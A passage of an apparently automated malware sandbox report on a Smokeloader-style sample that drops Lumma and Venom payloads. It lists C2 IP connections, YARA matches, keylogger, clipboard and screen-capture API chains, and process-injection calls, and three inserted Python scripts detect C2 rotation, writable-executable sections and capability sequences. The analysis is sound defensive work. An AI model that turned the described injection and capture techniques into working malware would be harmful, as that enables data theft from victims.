Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62376 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62377 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62378 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62380 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62381 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62382 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62383 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62384 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62386 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62387 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62388 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62393 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62394 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62395 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62398 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62400 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62401 version: TLS 1.2
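Read in order, the HTTPS lines above are not random: after two connections to 172.67.213.85, the sample cycles through 107.173.160.137, 107.173.160.139 and 167.235.128.153 on port 443 in a fixed order, over and over, with the client's ephemeral port climbing each time. The script below is an added example and is not part of the Joe Sandbox report. It parses lines in this exact format, drops the one line the report prints twice (same destination and same source port is one connection), counts hits per destination and tests whether the repeatedly contacted servers are visited in a fixed cyclic order. It assumes the report lists connections chronologically (the monotonically increasing source ports support that); the report carries no timestamps, so no beacon interval can be derived from it. The embedded sample is a subset of the lines above.

```python
import re
from collections import Counter

# Constructed sample: a subset of the report's own "HTTPS traffic detected"
# lines, including the line that the report prints twice.
SAMPLE_LINES = """\
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62335 version: TLS 1.2
"""

LINE_RE = re.compile(
    r"HTTPS traffic detected: (?P<dst>[\d.]+):(?P<dport>\d+) -> "
    r"(?P<src>[\d.]+):(?P<sport>\d+) version: (?P<tls>TLS [\d.]+)"
)


def parse_connections(text):
    """Parse report lines into (dst_ip, dst_port, src_port) tuples.

    Assumption: the sandbox hands out ephemeral source ports in increasing
    order, so report order is chronological order. The report has no
    timestamps. A line printed twice for the same (dst, dport, sport) is
    one connection and is kept once.
    """
    seen, conns = set(), []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["dst"], int(m["dport"]), int(m["sport"]))
        if key not in seen:
            seen.add(key)
            conns.append(key)
    return conns


def hits_per_destination(conns):
    """Number of connections per (dst_ip, dst_port)."""
    return dict(Counter((dst, dport) for dst, dport, _ in conns))


def rotation_cycle(conns, min_hits=3):
    """The fixed order in which the repeatedly contacted servers are
    visited, or None if the sequence is not a pure repetition of one
    permutation of them.

    Destinations hit fewer than min_hits times (one-off lookups, CDN
    fetches) are ignored before the periodicity test.
    """
    hot = {dst for (dst, _), n in hits_per_destination(conns).items() if n >= min_hits}
    seq = [dst for dst, _, _ in conns if dst in hot]
    k = len(hot)
    if k < 2 or len(seq) < 2 * k:
        return None
    cycle = seq[:k]
    if len(set(cycle)) != k:          # first period must contain each host once
        return None
    usable = len(seq) - len(seq) % k  # ignore a trailing partial period
    if all(seq[i] == cycle[i % k] for i in range(usable)):
        return cycle
    return None


def summarize(text):
    conns = parse_connections(text)
    return {
        "connections": len(conns),
        "hits": hits_per_destination(conns),
        "rotation": rotation_cycle(conns),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    for (dst, dport), n in sorted(s["hits"].items(), key=lambda kv: -kv[1]):
        print(f"{dst}:{dport}  {n} connections")
    print("rotation cycle:", s["rotation"])
```

A strict round-robin over several hosts on the same port is what a hard-coded fallback C2 list produces; the cycle returned here should be checked against the C2 entries in the malware configuration section of the report rather than treated as a finding on its own. Lowering min_hits to 2 pulls 172.67.213.85 into the hot set and the periodicity test correctly fails, because that host is contacted outside the cycle.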

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_0307ED00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307FB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 16_2_0307FB2F

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: venom.zip.14.dr Zip Entry: runvm.bat
Source: lumma.zip.14.dr Zip Entry: run.bat
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: adjijwj.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
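The two "Static PE information" lines above are worth more than a glance: the .text section of both the submitted sample and the dropped adjijwj carries IMAGE_SCN_MEM_WRITE together with IMAGE_SCN_CNT_CODE and IMAGE_SCN_MEM_EXECUTE, so the code section is mapped writable and executable. Ordinary compiler output does not mark .text writable; a self-decrypting or self-modifying stub needs it. The Python below is an added example, not part of the report or of any tool it names: it walks the DOS header, PE signature, COFF header and section table with the standard library only and lists every section that is both writable and executable. The input is a constructed header-only PE produced by build_minimal_pe so that the check runs offline; on a real file, pass the file's bytes to wx_sections instead.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}


def parse_sections(data):
    """Return [(name, characteristics)] from a PE file's section table.

    Walks the DOS header (e_lfanew at 0x3C) -> the "PE" signature -> the
    20-byte COFF header (NumberOfSections at +2, SizeOfOptionalHeader at
    +16) -> the 40-byte section headers (Name at +0, Characteristics at
    +36). The file is only read as bytes; nothing is loaded or executed.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt_hdr = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_opt_hdr
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        raw_name = struct.unpack_from("<8s", data, off)[0]
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((raw_name.rstrip(b"\0").decode("ascii", "replace"), characteristics))
    return sections


def flag_names(characteristics):
    """Flag names in the order the report prints them."""
    return [name for flag, name in FLAG_NAMES.items() if characteristics & flag]


def wx_sections(data):
    """Sections that are writable AND executable, i.e. the report's finding."""
    return [(name, flag_names(ch)) for name, ch in parse_sections(data)
            if ch & IMAGE_SCN_MEM_WRITE and ch & IMAGE_SCN_MEM_EXECUTE]


def build_minimal_pe(sections):
    """Constructed test input: a header-only 32-bit PE with the given
    [(name_bytes, characteristics)] section table. It has an empty optional
    header and no section contents, so it parses but would never load."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1), 0x200,
                    0x400 + 0x200 * i, 0, 0, 0, 0, ch)
        for i, (name, ch) in enumerate(sections)
    )
    return bytes(dos) + b"PE\0\0" + coff + table


# Constructed sample mirroring the report: .text is RWX, the other sections are normal.
SAMPLE_SECTIONS = [
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(SAMPLE_SECTIONS)
    for name, flags in wx_sections(blob):
        print(f"W+X section {name}: {', '.join(flags)}")
```

A writable code section is a packer or self-modifying-code indicator, not proof of malice by itself: some legacy toolchains and software protectors emit it too. Its value here is that it appears on both the submitted file and the dropped adjijwj, consistent with the same loader stub being reused.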
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401513
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 0_2_00402FD3
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_0040267C NtEnumerateKey, 0_2_0040267C
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation, 0_2_004020C4
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004026DC NtClose, 0_2_004026DC
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation, 0_2_004020E3
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation, 0_2_004020E7
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation, 0_2_004020FC
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00402285 NtQuerySystemInformation, 0_2_00402285
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation, 0_2_004020B6
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation, 0_2_004020B8
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess, 0_2_00403149
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401553
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower, 0_2_00403303
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040151E
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004025DD NtOpenKey, 0_2_004025DD
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641636900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation, 7_2_00007FF641636900
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655260 NtAllocateVirtualMemory, 7_2_00007FF641655260
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641653F30 NtQueryInformationProcess, 7_2_00007FF641653F30
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655100 NtWriteVirtualMemory, 7_2_00007FF641655100
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416559D0 NtProtectVirtualMemory, 7_2_00007FF6416559D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641654FC0 NtReadVirtualMemory, 7_2_00007FF641654FC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D7370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 19_2_6C8D7370
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D7490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 19_2_6C8D7490
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E2A98 NtProtectVirtualMemory, 19_2_028E2A98
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E2640 NtProtectVirtualMemory, 19_2_028E2640
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C867490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 20_2_6C867490
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C867370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 20_2_6C867370
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_0251167A NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect, 20_2_0251167A
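The "Code function" lines in the capture section above (OpenClipboard, GetClipboardData, GlobalLock, CloseClipboard in one function; GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt in another) and the Nt* chains listed in this section (NtCreateSection followed by two NtMapViewOfSection calls, RtlCreateUserThread, NtWriteVirtualMemory, NtProtectVirtualMemory) are API call sequences recovered from single functions. It is the ordered sequence, not any one API, that indicates a capability: GetDC or SelectObject on their own are everywhere in GUI code. The Python below is an added example, not part of the report. It parses lines in the report's "Code function" format and labels a function when all APIs of a capability occur in it in order. The capability table and its labels are the example's own triage heuristics (an assumption, sufficient for prioritisation but not proof); the embedded sample lines are copied from this report.

```python
import re

# Constructed sample: lines copied from this report's "Code function" entries,
# plus one function the report lists without API names.
SAMPLE_LINES = r"""
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_0307ED00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307FB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 16_2_0307FB2F
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401513
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 0_2_00402FD3
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655100 NtWriteVirtualMemory, 7_2_00007FF641655100
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416559D0 NtProtectVirtualMemory, 7_2_00007FF6416559D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160E810 7_2_00007FF64160E810
"""

# Line shape: "Source: <image> Code function: <id> [<api>,<api>,...,] <id>"
LINE_RE = re.compile(
    r"^Source: (?P<image>\S+) Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]+)"
    r"(?: (?P<apis>[\w,]+),)? (?P=fid)$"
)

# Capability -> APIs that must occur in this order inside ONE function.
# Labels and sequences are this example's own triage heuristics.
CAPABILITIES = {
    "clipboard read": ["OpenClipboard", "GetClipboardData", "GlobalLock", "CloseClipboard"],
    "screen capture": ["GetDC", "CreateCompatibleDC", "CreateCompatibleBitmap", "SelectObject", "BitBlt"],
    # One section mapped twice: one view for the writer, one for a second process.
    "section-mapping injection": ["NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection"],
    "thread creation via RtlCreateUserThread": ["RtlCreateUserThread"],
    "write to process memory": ["NtWriteVirtualMemory"],
    "change memory protection": ["NtProtectVirtualMemory"],
}


def contains_in_order(chain, needles):
    """True if every needle appears in chain in the given order (gaps allowed)."""
    it = iter(chain)
    return all(n in it for n in needles)  # each 'in' consumes the iterator up to its match


def parse_functions(text):
    """Return [(image_basename, function_id, [api, ...])] for each report line."""
    funcs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        apis = m["apis"].split(",") if m["apis"] else []
        funcs.append((m["image"].rsplit("\\", 1)[-1], m["fid"], apis))
    return funcs


def infer_capabilities(text):
    """image -> {capability label: [function ids that evidence it]}."""
    found = {}
    for image, fid, apis in parse_functions(text):
        for label, needles in CAPABILITIES.items():
            if contains_in_order(apis, needles):
                found.setdefault(image, {}).setdefault(label, []).append(fid)
    return found


if __name__ == "__main__":
    for image, caps in infer_capabilities(SAMPLE_LINES).items():
        for label, fids in caps.items():
            print(f"{image}: {label} <- {', '.join(fids)}")
```

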